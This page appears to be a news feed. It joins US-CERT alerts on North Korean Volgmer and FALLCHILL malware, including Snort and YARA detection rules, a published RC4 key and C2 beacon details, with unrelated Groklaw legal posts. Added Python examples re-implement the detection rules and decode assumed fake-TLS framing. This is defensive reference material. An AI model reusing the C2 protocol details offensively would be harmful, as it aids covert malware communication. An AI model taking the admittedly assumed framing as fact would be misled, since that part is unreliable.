For machines running Windows Server, a number of registry changes must be completed in addition to installation of the patches. NCCIC recommends verifying your Windows Server version before downloading applicable patches and performing registry edits. A list of registry changes can be found here: https://support.microsoft.com/en-us/help/4072698/windows-server-guidance-to-protect-against-the-speculative-execution

Antivirus
Typical antivirus programs are built on a signature management system, and may not be able to detect the vulnerabilities. NCCIC recommends checking with your antivirus vendor to confirm compatibility with Meltdown and Spectre patches. Microsoft recommends third-party antivirus vendors add a change to the registry key of the machine running the antivirus software. Without it, that machine will not receive any of the following fixes from Microsoft:
- Windows Update
- Windows Server Update Services
- System Center Configuration Manager

More information can be found here: https://support.microsoft.com/en-us/help/4072699/january-3-2018-windows-security-updates-and-antivirus-software.

Vendor Links
The following table contains links to advisories and patches published in response to the vulnerabilities. This table will be updated as information becomes available.

Note: NCCIC strongly recommends:
- downloading any patches or microcode directly from your vendor's website
- using a test environment to verify each patch before implementing

Link to Vendor Information - Date Added
Amazon - January 4, 2018
AMD - January 4, 2018
Android - January 4, 2018
Apple - January 4, 2018
ARM - January 4, 2018
CentOS - January 4, 2018
Chromium - January 4, 2018
Cisco - January 10, 2018
Citrix - January 4, 2018
Debian - January 5, 2018
DragonflyBSD - January 8, 2018
F5 - January 4, 2018
Fedora Project - January 5, 2018
Fortinet - January 5, 2018
HP - January 19, 2018
Google - January 4, 2018
Huawei - January 4, 2018
IBM - January 5, 2018
Intel - January 4, 2018
Juniper - January 8, 2018
Lenovo - January 4, 2018
Linux - January 4, 2018
LLVM: variant #2 - January 8, 2018
LLVM: builtin_load_no_speculate - January 8, 2018
LLVM: llvm.nospeculatedload - January 8, 2018
Microsoft Azure - January 4, 2018
Microsoft - January 4, 2018
Mozilla - January 4, 2018
NetApp - January 8, 2018
Nutanix - January 10, 2018
NVIDIA - January 4, 2018
OpenSuSE - January 4, 2018
Oracle - January 17, 2018
Qubes - January 8, 2018
Red Hat - January 4, 2018
SuSE - January 4, 2018
Synology - January 8, 2018
Trend Micro - January 4, 2018
Ubuntu - January 17, 2018
VMware - January 10, 2018
Xen - January 4, 2018
References
Graz University of Technology Meltdown website
Graz University of Technology Spectre website
Rogue Data Cache Load: CVE-2017-5754
Bounds Check Bypass: CVE-2017-5753
Branch Target Injection: CVE-2017-5715
CERT/CC’s Vulnerability Note VU#584653
Revision History
January 4, 2018: Initial version
January 5, 2018: Updated vendor information links for Citrix, Mozilla, and IBM in the table and added links to Debian, Fedora Project, and Fortinet
January 8, 2018: Added links to DragonflyBSD, Juniper, LLVM, NetApp, Qubes, and Synology
January 9, 2018: Updated Solution Section
January 10, 2018: Added links to Cisco and Nutanix
January 17, 2018: Added note to Mitigation section and links to Oracle and Ubuntu
January 18, 2018: Updated Description, Impact, and Solution Sections, and added an additional link
January 19, 2018: Added link to HP
January 31, 2018: Provided additional links and updated Description and Mitigation sections
Full report - 11/14/17 TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
Original release date: November 14, 2017 | Last revised: November 22, 2017
Systems Affected
Network systems
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a Trojan malware variant used by the North Korean government—commonly known as Volgmer. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra.

FBI has high confidence that HIDDEN COBRA actors are using the IP addresses—listed in this report’s IOC files—to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to North Korean government malicious cyber activity.

This alert includes IOCs related to HIDDEN COBRA, IP addresses linked to systems infected with Volgmer malware, malware descriptions, and associated signatures. This alert also includes suggested response actions to the IOCs provided, recommended mitigation techniques, and information on reporting incidents. If users or administrators detect activity associated with the Volgmer malware, they should immediately flag it, report it to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give it the highest priority for enhanced mitigation.

For a downloadable copy of IOCs, see:
- IOCs (.csv)
- IOCs (.stix)

NCCIC conducted analysis on five files associated with or identified as Volgmer malware and produced a Malware Analysis Report (MAR). MAR-10135536-D examines the tactics, techniques, and procedures observed. For a downloadable copy of the MAR, see:
- MAR (.pdf)
- MAR IOCs (.stix)
Description
Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries.

It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer.

The U.S. Government has analyzed Volgmer’s infrastructure and identified it on systems using both dynamic and static IP addresses. At least 94 static IP addresses were identified, as well as dynamic IP addresses registered across various countries. The greatest concentrations of dynamic IP addresses are identified below by approximate percentage:
- India (772 IPs) 25.4 percent
- Iran (373 IPs) 12.3 percent
- Pakistan (343 IPs) 11.3 percent
- Saudi Arabia (182 IPs) 6 percent
- Taiwan (169 IPs) 5.6 percent
- Thailand (140 IPs) 4.6 percent
- Sri Lanka (121 IPs) 4 percent
- China (82 IPs, including Hong Kong (12)) 2.7 percent
- Vietnam (80 IPs) 2.6 percent
- Indonesia (68 IPs) 2.2 percent
- Russia (68 IPs) 2.2 percent

Technical Details
As a backdoor Trojan, Volgmer has several capabilities including: gathering system information, updating service registry keys, downloading and uploading files, executing commands, terminating processes, and listing directories. In one of the samples received for analysis, the US-CERT Code Analysis Team observed botnet controller functionality.

Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library (.dll) files. The malware uses a custom binary protocol to beacon back to the command and control (C2) server, often via TCP port 8080 or 8088, with some payloads implementing Secure Socket Layer (SSL) encryption to obfuscate communications.

Malicious actors commonly maintain persistence on a victim’s system by installing the malware as a service. Volgmer queries the system and randomly selects a service in which to install a copy of itself. The malware then overwrites the ServiceDLL entry in the selected service's registry entry. In some cases, HIDDEN COBRA actors give the created service a pseudo-random name that may be composed of various hardcoded words.

Detection and Response
This alert’s IOC files provide HIDDEN COBRA indicators related to Volgmer. DHS and FBI recommend that network administrators review the information provided, identify whether any of the provided IP addresses fall within their organizations’ allocated IP address space, and—if found—take necessary measures to remove the malware.

When reviewing network perimeter logs for the IP addresses, organizations may find instances of these IP addresses attempting to connect to their systems. Upon reviewing the traffic from these IP addresses, system owners may find some traffic relates to malicious activity and some traffic relates to legitimate activity.

Network Signatures and Host-Based Rules
This section contains network signatures and host-based rules that can be used to detect malicious activity associated with HIDDEN COBRA actors. Although created using a comprehensive vetting process, the possibility of false positives always remains. These signatures and rules should be used to supplement analysis and should not be used as a sole source of attributing this activity to HIDDEN COBRA actors.

Network Signatures

alert tcp any any -> any any (msg:"Malformed_UA"; content:"User-Agent: Mozillar/"; depth:500; sid:99999999;)

YARA Rules

rule volgmer
{
    meta:
        description = "Malformed User Agent"
    strings:
        $s = "Mozillar/"
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $s
}
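The two checks above are complementary: the Snort signature sees the misspelled User-Agent on the wire, while the YARA rule only fires on a PE image that carries the same string, and its condition walks the DOS header to find the PE signature rather than trusting a fixed offset. The following Python is an added example, not part of this alert or the NCCIC rule set: it spells out the YARA condition step by step and exercises it on constructed PE-shaped byte buffers (not real samples). Function names are this example's own.

```python
import struct

# The YARA condition above, made explicit:
#   uint16(0) == 0x5A4D  and  uint16(uint32(0x3c)) == 0x4550  and  $s
# YARA reads integers little-endian, so 0x5A4D is the bytes "MZ" and 0x4550 is "PE".
MZ_MAGIC = 0x5A4D
PE_MAGIC = 0x4550
MARKER = b"Mozillar/"  # the misspelled User-Agent prefix both rules key on


def is_pe_file(data):
    """Mirror of the header test. uint32(0x3c) is the DOS header's e_lfanew field,
    which points at the "PE\\0\\0" signature. YARA treats a read past the end of the
    buffer as undefined (no match), so the same result is returned here."""
    if len(data) < 0x40:
        return False
    if struct.unpack_from("<H", data, 0)[0] != MZ_MAGIC:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 2 > len(data):
        return False
    return struct.unpack_from("<H", data, e_lfanew)[0] == PE_MAGIC


def matches_volgmer_rule(data):
    """True only for a PE image that also contains the $s string anywhere."""
    return is_pe_file(data) and MARKER in data


def build_sample(with_marker, with_pe_header=True):
    """Construct a 256-byte PE-shaped buffer for exercising the check (not a real binary)."""
    buf = bytearray(0x100)
    if with_pe_header:
        buf[0:2] = b"MZ"
        struct.pack_into("<I", buf, 0x3C, 0x80)  # e_lfanew -> offset 0x80
        buf[0x80:0x84] = b"PE\x00\x00"
    if with_marker:
        payload = b"User-Agent: Mozillar/4.0 (compatible)"
        buf[0xA0:0xA0 + len(payload)] = payload
    return bytes(buf)


if __name__ == "__main__":
    cases = [("PE with marker", build_sample(True)),
             ("PE without marker", build_sample(False)),
             ("marker in non-PE data", build_sample(True, with_pe_header=False))]
    for label, sample in cases:
        print(f"{label:24} -> {matches_volgmer_rule(sample)}")
```

The third case is the one worth noting when triaging hits: a captured HTTP request or a log file containing "Mozillar/" does not satisfy the YARA rule, which is why the Snort signature exists alongside it.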
Impact
A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include
- temporary or permanent loss of sensitive or proprietary information,
- disruption to regular operations,
- financial losses incurred to restore systems and files, and
- potential harm to an organization’s reputation.
Solution
Mitigation Strategies
DHS recommends that users and administrators use the following best practices as preventive measures to protect their computer networks:
- Use application whitelisting to help prevent malicious software and unapproved programs from running. Application whitelisting is one of the best security strategies as it allows only specified programs to run, while blocking all others, including malicious software.
- Keep operating systems and software up-to-date with the latest patches. Vulnerable applications and operating systems are the target of most attacks. Patching with the latest updates greatly reduces the number of exploitable entry points available to an attacker.
- Maintain up-to-date antivirus software, and scan all software downloaded from the Internet before executing.
- Restrict users’ abilities (permissions) to install and run unwanted software applications, and apply the principle of “least privilege” to all systems and services. Restricting these privileges may prevent malware from running or limit its capability to spread through the network.
- Avoid enabling macros from email attachments. If a user opens the attachment and enables macros, embedded code will execute the malware on the machine. For enterprises or organizations, it may be best to block email messages with attachments from suspicious sources. For information on safely handling email attachments, see Recognizing and Avoiding Email Scams.
- Follow safe practices when browsing the web. See Good Security Habits and Safeguarding Your Data for additional details.
- Do not follow unsolicited web links in emails. See Avoiding Social Engineering and Phishing Attacks for more information.

Response to Unauthorized Network Access
Contact DHS or your local FBI office immediately. To report an intrusion and request resources for incident response or technical assistance, contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), FBI through a local field office, or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).
References
Revision History
November 14, 2017: Initial version
This product is provided subject to this Notification and this Privacy & Use policy.
Full report - 11/14/17 TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
Original release date: November 14, 2017 | Last revised: November 22, 2017
Systems Affected
Network systems
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a remote administration tool (RAT) used by the North Korean government—commonly known as FALLCHILL. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra.

FBI has high confidence that HIDDEN COBRA actors are using the IP addresses—listed in this report’s IOC files—to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to any North Korean government malicious cyber activity.

This alert includes IOCs related to HIDDEN COBRA, IP addresses linked to systems infected with FALLCHILL malware, malware descriptions, and associated signatures. This alert also includes suggested response actions to the IOCs provided, recommended mitigation techniques, and information on reporting incidents. If users or administrators detect activity associated with the FALLCHILL malware, they should immediately flag it, report it to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give it the highest priority for enhanced mitigation.

For a downloadable copy of IOCs, see:
- IOCs (.csv)
- IOCs (.stix)

NCCIC conducted analysis on two samples of FALLCHILL malware and produced a Malware Analysis Report (MAR). MAR-10135536-A examines the tactics, techniques, and procedures observed in the malware. For a downloadable copy of the MAR, see:
- MAR (.pdf)
- MAR IOCs (.stix)
Description
According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors. HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware-as-a-service to establish persistence. Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.

During analysis of the infrastructure used by FALLCHILL malware, the U.S. Government identified 83 network nodes. Additionally, using publicly available registration information, the U.S. Government identified the countries in which the infected IP addresses are registered.

Technical Details
FALLCHILL is the primary component of a C2 infrastructure that uses multiple proxies to obfuscate network traffic between HIDDEN COBRA actors and a victim’s system. According to trusted third-party reporting, communication flows from the victim’s system to HIDDEN COBRA actors using a series of proxies as shown in figure 1.

Figure 1. HIDDEN COBRA Communication Flow

FALLCHILL uses fake Transport Layer Security (TLS) communications, encoding the data with RC4 encryption with the following key: [0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82].
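What "fake TLS with RC4" amounts to on the wire, as an added example (this is not code from the alert, the MAR, or the malware). It uses the 16-byte key quoted above; the record framing (a TLS 1.0 application-data header in front of RC4 output, no handshake, no MAC) and the beacon contents are assumptions made for the demonstration, since the alert does not document the real message layout.

```python
"""Added example: RC4 with the FALLCHILL key inside TLS-looking records.
Framing and beacon encoding are assumed for the demonstration."""
import struct

# The 16-byte RC4 key quoted in the alert.
FALLCHILL_RC4_KEY = bytes.fromhex("0d06092a864886f70d01010105000382")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling (KSA), then keystream XOR (PRGA).
    RC4 is symmetric, so the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # KSA: 256 iterations over the key
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # PRGA: one keystream byte per input byte
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wrap_fake_tls(plaintext: bytes, key: bytes = FALLCHILL_RC4_KEY) -> bytes:
    """Assumed framing: record type 0x17 (application data), version 3.1,
    2-byte big-endian length, then RC4(plaintext). It only looks like TLS."""
    body = rc4(key, plaintext)
    return b"\x17\x03\x01" + struct.pack(">H", len(body)) + body


def unwrap_fake_tls(stream: bytes, key: bytes = FALLCHILL_RC4_KEY) -> list:
    """Split a captured byte stream into records and decrypt each body.
    Returns [(record_type, plaintext), ...]; raises ValueError on a
    truncated or non-matching record so a bad capture is not silently
    half-decoded."""
    records, pos = [], 0
    while pos < len(stream):
        if pos + 5 > len(stream):
            raise ValueError("truncated record header at offset %d" % pos)
        rtype, version, length = struct.unpack_from(">BHH", stream, pos)
        if rtype != 0x17 or version != 0x0301:
            raise ValueError("not a TLS 1.0 application-data header at offset %d" % pos)
        body = stream[pos + 5:pos + 5 + length]
        if len(body) != length:
            raise ValueError("truncated record body at offset %d" % pos)
        records.append((rtype, rc4(key, body)))
        pos += 5 + length
    return records


# Constructed beacon with the kinds of fields the alert says FALLCHILL reports
# (OS version, processor, system name, local IP, generated ID, MAC). The
# '|'-separated encoding is invented for the example.
SAMPLE_BEACON = b"|".join([b"6.1.7601", b"Intel64", b"WKS-1", b"10.0.0.5",
                           b"deadbeef", b"00:11:22:33:44:55"])


def roundtrip(plaintext: bytes = SAMPLE_BEACON) -> bytes:
    """Encrypt, frame, unframe and decrypt; returns the recovered plaintext."""
    return unwrap_fake_tls(wrap_fake_tls(plaintext))[0][1]
```

The point for defenders: the key is static and is now published, so the "TLS" provides no confidentiality at all. Anyone holding a packet capture of the C2 session can run the record bodies through rc4() with this key and read the beacon and command traffic, which is exactly what an incident responder should do with captures from a suspected host.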
FALLCHILL collects basic system information and beacons the following to the C2:
- operating system (OS) version information,
- processor information,
- system name,
- local IP address information,
- unique generated ID, and
- media access control (MAC) address.

FALLCHILL contains the following built-in functions for remote operations that provide various capabilities on a victim’s system:
- retrieve information about all installed disks, including the disk type and the amount of free space on the disk;
- create, start, and terminate a new process and its primary thread;
- search, read, write, move, and execute files;
- get and modify file or directory timestamps;
- change the current directory for a process or file; and
- delete malware and artifacts associated with the malware from the infected system.

Detection and Response
This alert’s IOC files provide HIDDEN COBRA indicators related to FALLCHILL. DHS and FBI recommend that network administrators review the information provided, identify whether any of the provided IP addresses fall within their organizations’ allocated IP address space, and—if found—take necessary measures to remove the malware.

When reviewing network perimeter logs for the IP addresses, organizations may find instances of these IP addresses attempting to connect to their systems. Upon reviewing the traffic from these IP addresses, system owners may find some traffic relates to malicious activity and some traffic relates to legitimate activity.

Network Signatures and Host-Based Rules
This section contains network signatures and host-based rules that can be used to detect malicious activity associated with HIDDEN COBRA actors. Although created using a comprehensive vetting process, the possibility of false positives always remains.
These signatures and rules should be used to supplement analysis and should not be used as a sole source of attributing this activity to HIDDEN COBRA actors.

Network Signatures
alert tcp any any -> any any (msg:"Malicious SSL 01 Detected"; content:"|17 03 01 00 08|"; pcre:"/\x17\x03\x01\x00\x08.{4}\x04\x88\x4d\x76/"; rev:1; sid:2;)
alert tcp any any -> any any (msg:"Malicious SSL 02 Detected"; content:"|17 03 01 00 08|"; pcre:"/\x17\x03\x01\x00\x08.{4}\x06\x88\x4d\x76/"; rev:1; sid:3;)
alert tcp any any -> any any (msg:"Malicious SSL 03 Detected"; content:"|17 03 01 00 08|"; pcre:"/\x17\x03\x01\x00\x08.{4}\xb2\x63\x70\x7b/"; rev:1; sid:4;)
alert tcp any any -> any any (msg:"Malicious SSL 04 Detected"; content:"|17 03 01 00 08|"; pcre:"/\x17\x03\x01\x00\x08.{4}\xb0\x63\x70\x7b/"; rev:1; sid:5;)

YARA Rules
The following rules were provided to NCCIC by a trusted third party for the purpose of assisting in the identification of malware associated with this alert.

THIS DHS/NCCIC MATERIAL IS FURNISHED ON AN “AS-IS” BASIS. These rules have been tested and determined to function effectively in a lab environment, but we have no way of knowing if they may function differently in a production network. Anyone using these rules is encouraged to test them using a data set representative of their environment.

rule rc4_stack_key_fallchill
{
    meta:
        description = "rc4_stack_key"
    strings:
        $stack_key = { 0d 06 09 2a ?? ?? ?? ?? 86 48 86 f7 ?? ?? ?? ?? 0d 01 01 01 ?? ?? ?? ?? 05 00 03 82 41 8b c9 41 8b d1 49 8b 40 08 48 ff c2 88 4c 02 ff ff c1 81 f9 00 01 00 00 7c eb }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $stack_key
}

rule success_fail_codes_fallchill
{
    meta:
        description = "success_fail_codes"
    strings:
        $s0 = { 68 7a 34 12 00 }
        $s1 = { ba 7a 34 12 00 }
        $f0 = { 68 5c 34 12 00 }
        $f1 = { ba 5c 34 12 00 }
    condition:
        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and (($s0 and $f0) or ($s1 and $f1))
}
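The two detection mechanisms above, re-implemented in Python and run over constructed data, as an added example (not code from the alert, its IOC files, or the rule author, and no FALLCHILL sample is involved). The Snort rules match a TLS 1.0 application-data record header (17 03 01 00 08), four arbitrary bytes, then one of four 4-byte markers; the YARA rules combine a PE check (MZ at offset 0, PE at e_lfanew) with wildcard hex patterns. Two things worth knowing before deploying them: the 16 key bytes `0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82` are a slice of the standard DER header of an RSA SubjectPublicKeyInfo (`06 09 2a 86 48 86 f7 0d 01 01 01` is the rsaEncryption OID), so any binary that embeds an RSA public key contains them verbatim; the rule avoids that false positive by requiring the 4-byte gaps and the RC4 key-scheduling loop bytes that follow. The constructed "hostile" image below assumes the key is written to the stack with `mov dword [rsp+disp8], imm32` (opcode C7 44 24 disp, then the immediate), which is what those gaps would span; that encoding is my assumption, not something the alert states.

```python
"""Added example: Python re-implementation of the alert's Snort and YARA logic,
exercised on constructed inputs (none of this is real malware)."""
import re
import struct

# ---- 1. network: the fake-TLS beacon signatures (Snort sid 2..5) ----------
FAKE_TLS_RE = re.compile(
    rb"\x17\x03\x01\x00\x08.{4}"
    rb"(\x04\x88\x4d\x76|\x06\x88\x4d\x76|\xb2\x63\x70\x7b|\xb0\x63\x70\x7b)",
    re.DOTALL)  # the alert's pcre has no /s flag, so its '.' skips 0x0a; DOTALL closes that gap
RULE_MSG = {
    b"\x04\x88\x4d\x76": "Malicious SSL 01 Detected",
    b"\x06\x88\x4d\x76": "Malicious SSL 02 Detected",
    b"\xb2\x63\x70\x7b": "Malicious SSL 03 Detected",
    b"\xb0\x63\x70\x7b": "Malicious SSL 04 Detected",
}


def match_fake_tls(payload: bytes) -> list:
    """Return [(offset, rule message), ...] for every hit in one TCP payload."""
    return [(m.start(), RULE_MSG[m.group(1)]) for m in FAKE_TLS_RE.finditer(payload)]


# ---- 2. host: the YARA PE condition and '??' wildcard hex strings ---------
def is_pe(data: bytes) -> bool:
    """uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550, bounds-checked."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != 0x5A4D:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 2 <= len(data) and struct.unpack_from("<H", data, e_lfanew)[0] == 0x4550


def hex_pattern(yara_hex: str):
    """Compile a YARA hex string (literal bytes and '??' only; no jumps or
    alternations) into a bytes regex."""
    parts = [b"." if tok == "??" else b"\\x%02x" % int(tok, 16)
             for tok in yara_hex.strip("{} ").split()]
    return re.compile(b"".join(parts), re.DOTALL)


RC4_STACK_KEY = hex_pattern(
    "0d 06 09 2a ?? ?? ?? ?? 86 48 86 f7 ?? ?? ?? ?? 0d 01 01 01 ?? ?? ?? ?? 05 00 03 82 "
    "41 8b c9 41 8b d1 49 8b 40 08 48 ff c2 88 4c 02 ff ff c1 81 f9 00 01 00 00 7c eb")
S0, S1 = hex_pattern("68 7a 34 12 00"), hex_pattern("ba 7a 34 12 00")
F0, F1 = hex_pattern("68 5c 34 12 00"), hex_pattern("ba 5c 34 12 00")


def rule_rc4_stack_key_fallchill(data: bytes) -> bool:
    return is_pe(data) and RC4_STACK_KEY.search(data) is not None


def rule_success_fail_codes_fallchill(data: bytes) -> bool:
    hit = lambda pat: pat.search(data) is not None
    return is_pe(data) and ((hit(S0) and hit(F0)) or (hit(S1) and hit(F1)))


# ---- constructed inputs (labelled; none of this is real malware) ----------
def fake_pe(code: bytes) -> bytes:
    """Minimal PE-shaped image: 'MZ', e_lfanew = 0x80, 'PE\\0\\0', then code."""
    hdr = bytearray(0x84)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    hdr[0x80:0x84] = b"PE\0\0"
    return bytes(hdr) + code


RC4_KEY = bytes.fromhex("0d06092a864886f70d01010105000382")   # key from the alert
# Assumption: key written to the stack as four 'mov dword [rsp+disp8], imm32'
# (C7 44 24 disp + 4-byte immediate); the rule's 4-byte '??' gaps span the opcodes.
STACK_BUILT_KEY = b"".join(bytes([0xC7, 0x44, 0x24, 0x20 + 4 * i]) + RC4_KEY[4 * i:4 * i + 4]
                           for i in range(4))
KSA_LOOP = bytes.fromhex("418bc9418bd1498b400848ffc2884c02ffffc181f9000100007ceb")
PUSH_OK, PUSH_FAIL = bytes.fromhex("687a341200"), bytes.fromhex("685c341200")  # $s0, $f0
HOSTILE_PE = fake_pe(STACK_BUILT_KEY + KSA_LOOP + PUSH_OK + PUSH_FAIL)
# Benign PE embedding an RSA SubjectPublicKeyInfo: the 16 key bytes occur verbatim
# (offsets 5..20 of this DER header) but not as stack immediates, so no match.
RSA_SPKI_HEADER = bytes.fromhex("30820122300d06092a864886f70d01010105000382010f00")
BENIGN_PE = fake_pe(RSA_SPKI_HEADER + b"\0" * 32)

BEACON = b"\x17\x03\x01\x00\x08" + b"\x11\x22\x33\x44" + b"\x04\x88\x4d\x76"  # constructed
REAL_TLS_LOOKALIKE = b"\x17\x03\x01\x00\x08" + bytes(range(8))
```

If you load the alert's Snort rules as published, renumber sid:2 through sid:5 into the local range (1000000 and above): SIDs below 1000000 are reserved for rules shipped with Snort and will collide. The pcre in the published rules has no `s` modifier, so `.{4}` will not match a 0x0a byte in the gap; the Python version uses DOTALL, and a rule tuned the same way (`/.../s`) closes that blind spot.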
Impact
A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:
- temporary or permanent loss of sensitive or proprietary information,
- disruption to regular operations,
- financial losses incurred to restore systems and files, and
- potential harm to an organization’s reputation.
Solution
Mitigation Strategies
DHS recommends that users and administrators use the following best practices as preventive measures to protect their computer networks:
- Use application whitelisting to help prevent malicious software and unapproved programs from running. Application whitelisting is one of the best security strategies as it allows only specified programs to run, while blocking all others, including malicious software.
- Keep operating systems and software up-to-date with the latest patches. Vulnerable applications and operating systems are the target of most attacks. Patching with the latest updates greatly reduces the number of exploitable entry points available to an attacker.
- Maintain up-to-date antivirus software, and scan all software downloaded from the Internet before executing.
- Restrict users’ abilities (permissions) to install and run unwanted software applications, and apply the principle of “least privilege” to all systems and services. Restricting these privileges may prevent malware from running or limit its capability to spread through the network.
- Avoid enabling macros from email attachments. If a user opens the attachment and enables macros, embedded code will execute the malware on the machine. For enterprises or organizations, it may be best to block email messages with attachments from suspicious sources. For information on safely handling email attachments, see Recognizing and Avoiding Email Scams.
- Follow safe practices when browsing the web. See Good Security Habits and Safeguarding Your Data for additional details.
- Do not follow unsolicited web links in emails. See Avoiding Social Engineering and Phishing Attacks for more information.
Response to Unauthorized Network Access
Contact DHS or your local FBI office immediately.
To report an intrusion and request resources for incident response or technical assistance, contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), FBI through a local field office, or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).
References
Revision History
November 14, 2017: Initial version
This product is provided subject to this Notification and this Privacy & Use policy.
Full report
bugtraq mailing list
Help Net Security - Vulnerabilities
heise online News
Home - THE INQUIRER
Groklaw - 08/20/13 Forced Exposure ~pj
The owner of Lavabit tells us that he's stopped using email and if we knew what he knew, we'd stop too. There is no way to do Groklaw without email. Therein lies the conundrum.
What to do?
Full report - 08/15/13 Apple v. Samsung I: Case Management Statement, Hearing Aug. 21 ~pj Updated
There will be a hearing in Apple v. Samsung I in Judge Lucy Koh's courtroom, Courtroom 8 on the 4th floor, on August 21 at 2:00 PM, so if any of you stalwarts can attend, that would be fabulous. You don't even have to wake up early.
What's it about? Didn't they just have a case management hearing in April? Why yes. Yes, they did, but there have been "progress and changes" since, according to the parties' Joint Case Management Statement [PDF], which fills us in on the details. Both parties would like some changes since the last case management hearing. Here's the last joint case management statement, back in April. And the judge's order on April 30 was to go forward immediately with the damages trial, unless certain things happened in the USPTO reexaminations of Apple's patents at issue. Some of those things have almost happened, and there are other quirks, so some changes are being requested. The real core issue is Samsung's '381 motion, asking for a new trial on Apple's '381 patent based on newly discovered evidence or for entry of judgment on liability. Apple Opposes with a capital O. It now wants another chance to file a sur-reply [PDF], which Samsung opposes [PDF], claiming that "Apple identifies no 'new' arguments Samsung raised in its reply that were not responsive to arguments in Apple's opposition." The parties have been told that this motion wasn't on the calendar yet, but that they should be prepared to argue it on August 21. There is also the fact that the USPTO has found all relevant claims in the '915 patent invalid in a final office action. There can be more to come on that, but how it impacts the damages trial is the question.

And that is why we really should be there to hear it, if any of you can arrange your affairs to get there and be our eyes and ears. Samsung is telling the court that "Apple is attempting to 'sandbag' Samsung and obtain an unfair tactical advantage" by various proposals on how to go forward and by refusing to seriously meet and confer with Samsung. For example, Apple wants the judge to restrict the parties to the same exhibits used at the first trial. But that's not really fair in Samsung's eyes, because since that first trial, Apple has said things to the USPTO that conflict with what they said about the '381 and '915 patents at that trial:

Samsung does not believe the Court should limit the parties to the same exhibits disclosed prior to the first trial. For example, Apple has made numerous admissions to the USPTO subsequent to the first trial that directly contradict its arguments concerning the scope of the '381 and '915 patents. Apple should not be permitted to tell the Patent Office one thing and the new jury another. Samsung should be able to put this new evidence before the jury. Doing so would raise no issues concerning inconsistent appellate records because liability issues are not being retried and this damages trial will have its own separate record. Rather, the trial should be held based on an evidentiary record as it exists at the time of the new trial.

If you can go, email me please and I'll tell you more. [Update: We still need a volunteer.]
Full report - 08/13/13 Judge Robart Rules in MS v. Motorola: Seeking an Injunction on a FRAND Patent Can Be Perfectly Proper ~pj Updated - As text.
Judge James L. Robart has now ruled [PDF, 38 pages] on Microsoft and Motorola's summary judgment motions, granting in part and denying in part.
He has ruled that seeking an injunction over a FRAND patent can be proper and is not necessarily a breach of the FRAND commitment:

Additionally, as explained above, material issues of fact exist regarding whether the October offer letters violated the duty of good faith. In addition to the rate contained in the offer letters, the jury will consider language of the letters, the circumstances surrounding the letters, the industry custom and practice, and Motorola's intent in sending the letters. Motorola has presented evidence that the letters were sent in good faith, and the jury will make the final determination....

